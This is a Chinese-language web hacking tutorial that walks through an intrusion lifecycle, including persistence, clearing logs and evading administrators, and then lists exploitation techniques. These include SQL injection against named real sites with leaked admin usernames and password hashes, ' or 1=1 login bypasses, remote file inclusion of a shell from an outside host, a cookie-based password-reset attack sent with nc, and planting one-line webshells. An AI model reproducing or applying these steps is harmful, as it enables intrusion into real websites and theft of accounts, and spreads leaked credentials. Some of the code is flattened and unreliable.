攻击类型
第一部分 常见WEB攻击
一.按传统攻击分类,大概有以下几阶段
1.漏洞探察,端口探测
2.攻击外部入口
3.架设连接内部网络的程序
4.攻击内部网络
5.攻击内部主机或网络,建立外连通道
6.扩大内部网络攻击渗透的范围,下载传输内部网络的资料
7.固定内部网络的战果,建立长期入侵通道
8.清理入口,内部网络留下的工作日志
9.尽量是内部网络和外部入口设备和机器保持网络管理员看起来的正常,减少网络传输的频率,保证能长期占领该网络
二.下面就直接讲入侵的传统手法
1.常见的就是扫描该网络的出口,找到映射出来的端口
2.弱口令猜解,溢出,WEB渗透的办法,另外还有一些网络欺骗的手段,最后就是社会工程的方法搞定外部入口
3.现在网络基本上的外部入口不会有特别的端口,常见协议有FTP,SSH,POP3,SMTP,WEB,telnetd,还有某些协议代理的端口,所以基本可用的方法首先就是溢出,大家可以去看看0DAY,实在没有就去找找发布过的1DAY,但是一般的没有太大的成功几率.
4.我这里谈的攻击,主要谈谈通过WEB的渗透办法
三.传统的WEB漏洞
3.1. 目录浏览
通过浏览地址http://IP/docquery,可以查看到docquery目录下的所有文件的名称
3.2. 备份页面暴源码
管理员为了维护的方便,会在web页面的目录保存页面编辑时候的备份文件,或者是由于某些编辑软件自动生成bak为扩展名的页面文件,导致在浏览器直接可以查看页面文件源代码
3.3. 默认管理页面漏洞
比如
安装的是tomcat,存在默认管理页面http://IP/admin/index.jsp,并且没有更改默认的登陆帐号的密码,使用默认的账号密码可以登录。通过上传木马可以轻易就获得WEBSHELL,由于tomcat以服务运行,因此直接获得system权限
3.4 SQL 注入
比如,http://IP/Page.jsp?City=天津
该链接存在注入漏洞,参数city附近语法不严格导致产生注入点,可以使用数据库猜解工具得到数据库中的数据。
比如, 漏洞测试网站一:云南黑客联盟
申请一个用户,登陆,然后发表文章,D:YNHACKUSER../inc/cls_main.asp网站路径
管理员数小于5,管理员数为3,第一个管理员用户名长度小于7,第一个管理员用户名长度为5用户名第一个字母为a,第一个管理员用户名为 admin,MD5密码第一个是7,后面的我就不猜了,和猜用户名同一个道理,不过,这里长度有16位。手工很慢,为此,使用UNION查寻来提高效率,
第一个管理员用户名 admin md5密码 7a57a5a743894a0e->admin.现在网速太慢。被锁定了,这是第二个管理员 liucho0400 密码 b086f71d080453fa,第三个 灵男 密码581abc28e23d1669,后面的工作我就不作了,如果拿到解密后的密码进入后台轻易得到WEBSHELL
漏洞测试网站二:新云官方网站
不能注册,社会工程学来 admin admin 不行 123 123 不行,123456 123456 成功进入,发表文章进行了错误处理,提交 --,正常,说明是sql版,直接加用户,我们在nc_user中加一个用户名和密码
都为 123的用户,先MDB转化一下,123->ac59075b964b0715,提交
insert into nc_user(username,password) values('123','ac59075b964b0715'),现在登陆试试,
可能数据库中有这个用户了吧,那我们它密码
update nc_user set password='ac59075b964b0715' where username='123',成功。
现在利用辅助工具注入,前提是要登陆,不好意思,要用123456登陆才能看自己的文章
好,现在已成功注入了。
至于拿WEBSHELL的事,我就不去搞了。大家自己发挥吧
3.5 登陆验证不严
当尝试输入登陆为:1’ or 1=1--时提示密码错误,说明程序已经接受了不合格登陆输入 conetmibver1.0漏洞直接进入后台
关键字:co net mib ver 1.0 design by hypo
安全漏洞利用方法:
后台管理界面:http://www.boy-girl.cn/manage/Login.asp
然后利用漏洞 'or'='or'登录。
3.6 跨站
构建链接http://IP/IDC.jsp?Sex=男&Sex=女
&strArea=0”>,界面弹出JAVASCRIPT对话框“HELLO,MATRIXAY!”。
3.7任意文件被下载
https://ip/download.jsp?downpath=down.jsp
只要知道文件路径,可以下载系统中的任意文件。
3.8 暴露绝对路径
提交特殊参数,导致页面出错,暴露页面文件的绝对路径
3.9 命令解释行的脚本命令
http://IP/cmd.pl?dir+c:\\
服务器存在类似的脚本解释程序,可以执行服务器上的命令
3.10 存在upload.asp等类似文件上传文件的利用
可以使用桂林老兵等上传程序突破文件名限制上传WEBSHELL木马,或者用nc.exe上传也可以
3.11 .php脚本远程文件包含漏洞
.php脚本没有正确地验证某些变量的数据,允许攻击者通过包含本地或外部资源的任
意文件导致执行任意PHP代码。
http://www.example.com/wp-includes/functions.php?file=http://www.example2.com/shell.txt?
3.12 session欺骗漏洞
比如, 拥原创文学整站程序:
(1).注入漏洞:list.asp对articleID变量没做过滤导致注入漏洞,还有dispac.asp文件对id变量没做过滤,但是这个文件要管理员登陆后才能注入,所以有点像鸡漏洞。
(2)session欺骗漏洞:和上面的方法一样,写一个asp文件session(\"idu\")=\"black-you\"进后台看看吧!!
3.13 cookies注入
比如, 雷霆购物系统:
我们先来看看reseach.asp才是真正的搜索文件,其中又这样一段代码:
ifname<>\"\"then
sql=sql&\"andnamelike'%\"&name&\"%'\"
endif
ifauthor<>\"\"then
sql=sql&\"andauthorlike'%\"&author&\"%'\"
endif
ifmanufacturer<>\"\"then
sql=sql&\"andmarklike'%\"&manufacturer&\"%'\"
endif
ifcode<>\"\"then
sql=sql&\"andcategoryidlike'%\"&code&\"%'\"
这就是经典的填字游戏!!因为它在高级搜索页面作了javascript过滤,所以我们要用nc提交来进行cookies注入。但我们也可以在快速搜索页面提交:“504%’注入语句’%504”就能注入了,抓包然后把地址放在NBSI里就能注入了,因为我的IIS有点问题,所有就没深入测试。
3.14 cookies欺骗漏洞
Forget.asp是密码找回文件文件,repws.asp是修改密码文件,我们来看看它的部分代码:
<%
ifrequest(\"username\")=\"\"then
callMsgBox(\"非法使用!\
response.end
endif
dimtmp
setrs=server.CreateObject(\"adodb.recordset\")
'提交修改密码
ifnotisempty(request(\"SubmitRePws\"))then
ifrequest(\"password\")<>request(\"password2\")thencallMsgBox(\"再次输入密码不一致!\
rs.open\"selectpasswordfrom[user]whereusername='\"&trim(request(\"username\"))&\"'\
rs(\"password\")=md5(trim(request(\"password2\")))
rs.update
rs.close
callMsgBox(\"您的密码取回成功,请登录!\
response.end
endif
rs.open\"selectanswerfrom[user]whereusername='\"&trim(request(\"username\"))&\"'\
tmp=trim(rs(\"answer\"))
rs.close
iftmp<>md5(request(\"answer\"))then
callMsgbox(\"对不起,您输入的问题答案不正确\
response.end
endif
setrs=nothing
%>
呵呵,笑了吧!我们现在来构造数据包:
POST/lt/repws.aspHTTP/1.1
Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*
Referer:http://localhost/lt/repws.asp Accept-Language:zh-cn
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip,deflate
User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1;Maxthon)
Host:localhost
Content-Length:72
Connection:Keep-Alive
Cache-Control:no-cache
Cookie:ASPSESSIONIDQGQGQXOO=IFKFCOFAPEOINKPNGDEJEKOF
password=121212&password2=121212&SubmitRePws=%CC%E1%BD%BB&username=x-key
修改就把ueername和password、possword2还有Content-Length修改一下就行了,其他的都不用改。我们现在用nc提交:nclocalhost80<1.txt>1.htm,如图3所示,
然后我们运行一下1.htm,就会看到图4的消息框了!
3.15一句话木马插入到数据库当中
网络呼机
网络呼机AllRightsReserved聊天室进入方式在线
利用的数据库文件名:http://目标IP/3a4b5c.asp,将一句话木马插入到上面的数据库当中。
注册进入后在留言里面写入一句话木马:
3.16 本地存网页欺骗服务器
比如, TRSWAS4.0系统
关键字:TRSWAS
安全漏洞利用方法:详见“C:\emp\\SQL注入相关\\TRS系统漏洞利用.html”
信息技术有限公司 reserved.
请填写您的新密码,并且牢记此密码。
密码修改成功后,您可以直接用此密码登录系统。